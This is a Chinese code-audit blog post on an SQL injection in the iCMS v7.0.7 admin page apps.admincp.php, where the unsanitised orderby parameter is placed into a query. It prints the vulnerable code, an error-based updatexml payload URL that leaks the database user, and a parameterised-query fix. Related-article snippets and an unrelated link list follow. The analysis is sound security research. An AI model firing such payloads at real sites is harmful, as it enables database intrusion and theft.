0x00 环境准备

iCMS官网:https://www.icmsdev.com

网站源码版本:iCMS-v7.0.7

程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest

默认后台地址:http://127.0.0.1/admincp.php

默认账号密码:用户名密码自设

测试网站首页:

0x01 代码分析

1、漏洞文件位置:/app/apps/apps.admincp.php  第266-282行:

  1. public function do_manage(){
  2. // if($_GET['keywords']) {
  3. // $sql=" WHERE `keyword` REGEXP '{$_GET['keywords']}'";
  4. // }
  5. $orderby    =$_GET['orderby']?$_GET['orderby']:"id DESC";
  6. $maxperpage = $_GET['perpage']>0?(int)$_GET['perpage']:50;
  7. $total      = iCMS::page_total_cache("SELECT count(*) FROM `#iCMS@__apps` {$sql}","G");
  8. iUI::pagenav($total,$maxperpage,"个应用");
  9. $rs     = iDB::all("SELECT * FROM `#iCMS@__apps` {$sql} order by {$orderby} LIMIT ".iUI::$offset." , {$maxperpage}");
  10. 10.   $_count = count($rs);
  11. 11.
  12. 12.   //分组
  13. 13.   foreach ($rs as $key => $value) {
  14. 14.     $apps_type_group[$value['type']][$key] = $value;
  15. 15.   }
  16. 16.     include admincp::view("apps.manage");

17. }

 

这段函数中将获取到的参数orderby参数,未经任何处理,直接带入数据库执行,导致程序在实现上存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

0x02 漏洞利用

根据漏洞位置,构造出参数 Payload:

http://127.0.0.1/admincp.php?app=apps&do=manage&from=modal&orderby=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))—

0x03 修复建议

使用参数化查询可有效避免SQL注入

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析相关推荐

  1. 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  2. 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  3. 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  4. 动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞

    动易网站管理系统vote.asp页面存在SQL注入漏洞 测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等 ...

  5. php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析

    *世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做* cms背景介绍 PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用: ...

  6. TP5 框架 SQL 执行流程分析及 5.0.9 SQL 注入漏洞分析

    文章目录 SQL查询流程 TP 5.0.9 SQL注入 修复 SQL查询流程 TP5手册:https://www.kancloud.cn/manual/thinkphp5/118044 在分析 tp5 ...

  7. 迅雷某页面存在sql注入漏洞

    漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  8. php7 魔术引号,php代码审计魔术引号带来的注入问题浅析之Discuz_7.x faq.php SQL注入漏洞...

    首先根据存在的目的可以理解处理机制: 当打开时所有的'单引号."双引号.\反斜线.NULL字符都被自动加上一个反斜线进行转义: 1)得到原字符的场景举例(',\,",null) $ ...

  9. 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞

    受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...

最新文章

  1. 2022-2028年中国木门行业投资分析及前景预测报告(全卷)
  2. 全局函数(直接使用)
  3. Hierarchical Cluster 层次聚类
  4. Bash Shell 的一些语法
  5. [转载] python中try Except抛出异常使用方法
  6. Win10+caffe+CUDA9.1+vs2013+Matlab2018b+GPU环境,跑通faster_rcnn-master
  7. 关于python随机抽取各类型不重复值的思考(sample与randint的区别)
  8. 廖雪峰python教程答案-廖雪峰老师Python3教程练习整理
  9. Robots协议(摘)
  10. 测试类写法以及几种常用方式
  11. 计算机录屏幕和声音的软件是什么,电脑录屏软件带声音哪个好用 电脑录屏软件带声音软件...
  12. MSP430学习笔记1——msp430概述
  13. [转]XXX无法访问。你可能没有权限使用网络资源
  14. 云服务平台重构点 @Arthur @Gyb
  15. TypeError: __init__() got an unexpected keyword argument ‘rate‘
  16. 【前端小实战】页面文字搜索功能
  17. 【Java】如何检测、替换4个字节的utf-8编码(此范围编码包含emoji表情)
  18. 【MySQL】DDL语句详解:列类型、列约束及自增列_Unit03
  19. 快来看一看String类内部是如何实现的
  20. 从.caffemodel/.caffemodel.h5提取Caffe模型的参数

热门文章

  1. 查看文章影响因子的插件_这个浏览器插件可以智能查询SCI论文被引情况
  2. 传感器的灵敏度 分辨率与分辨力和精度 + 光纤光缆
  3. python 打印一年的日历
  4. python tkinter库 密码实时显示_python tkinter库实现气泡屏保和锁屏
  5. 分享几个互联网求职神器,搞明白了,春招再严峻也不用担心!
  6. 华为FusionSphere云计算解决方案资料集
  7. 3--cad模板文件的建立方法
  8. 官方2013年6月CISA考试报名时间公布
  9. Tomcat原理系列之四:Tomat如何启动spring(加载web.xml)
  10. python--千库网素材爬取